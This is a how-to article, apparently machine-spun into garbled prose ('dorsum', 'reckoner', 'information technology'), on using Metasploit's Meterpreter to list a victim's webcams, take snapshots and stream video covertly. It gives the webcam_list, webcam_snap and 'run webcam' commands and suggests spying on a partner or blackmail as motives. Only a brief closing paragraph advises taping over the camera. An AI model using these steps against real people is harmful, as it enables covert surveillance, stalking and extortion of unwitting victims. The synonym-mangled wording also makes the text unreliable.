
How To Hack A Computer Camera

Welcome dorsum, my hacker novitiates!

Like in my final article on remotely installing a keylogger onto somebody's computer, this guide will continue to display the abilities of Metasploit's powerful Meterpreter by hacking into the victim's webcam. This will allow us to control the webcam remotely, capturing snapshots from information technology.

Image by TheAlieness GiselaGiardino23/Flickr

Why exactly would you desire to hack into somebody'southward webcam? Perhaps yous suspect your significant other of having a fling. Or, maybe you're into blackmailing. Or, maybe you're just a creep. But the real purpose is to prove just how easy it is, so you're enlightened that it can exist washed—then you tin can protect yourself against it.

Unlike just installing a command shell on the victim reckoner, the Meterpreter has the ability to do numerous and nigh unlimited things on the target's computer. The key is to become the Meterpreter installed on their system first.

I've shown how to practise this in some of my previous articles, where you lot could get the victim to click on a link to our malicious website, send a malicious Microsoft Office document or Adobe Acrobat file, and more.

So, now let's fire up Metasploit and install Meterpreter on the victim's arrangement. Once we accept washed that, we can then begin to view and capture images from their webcam.

Pace 1: List the Victim's Webcams

Metasploit's Meterpreter has a built-in module for controlling the remote organization's webcam. The first matter we need to do is to cheque if there is a web cam, and if there is, become its name. We can do that past typing:

meterpreter > webcam_list

If he/she has a webcam, the system will come dorsum with a list of all the webcams.

Step 2: Snap Pictures from the Victim'southward Webcam

Now that we know he/she has a webcam, we can take a snapshot from the webcam past typing:

meterpreter > webcam_snap

The organization volition now salvage a snapshot from her webcam onto our system in the directory /opt/framework3/msf3, which we can open up and see what's going on.

Image by Daquella manera/Flickr

The quality of the epitome saved all depends on your victim's webcam and environment.

Pace 3: Watch Streaming Video from the Victim's Webcam

Now that nosotros know how to capture a single snapshot from the victim's webcam, we will at present want to run the webcam and then that we can watch a continuous video stream. We can exercise this by typing;

meterpreter > run webcam -p /var/www

This command starts his/her webcam and sends its streaming output to /var/www/webcam.htm.

How to Protect Yourself from Webcam Intrusion

So, what can y'all do to make certain no one is peeking in on your habits in front of the calculator? The easiest solution—cover your webcam upwardly. Some laptops with built-in webcams actually have a slide encompass y'all can use.

If that's non the case, a piece of non-translucent tape should to the trick, unless you want to buy one of these or these things. And if you however have one of those old-schoolhouse USB webcams, simply unplug it.

We will continue to explore fun means we can utilize the Meterpreter in the nearly future, so brand sure to come back for more than!

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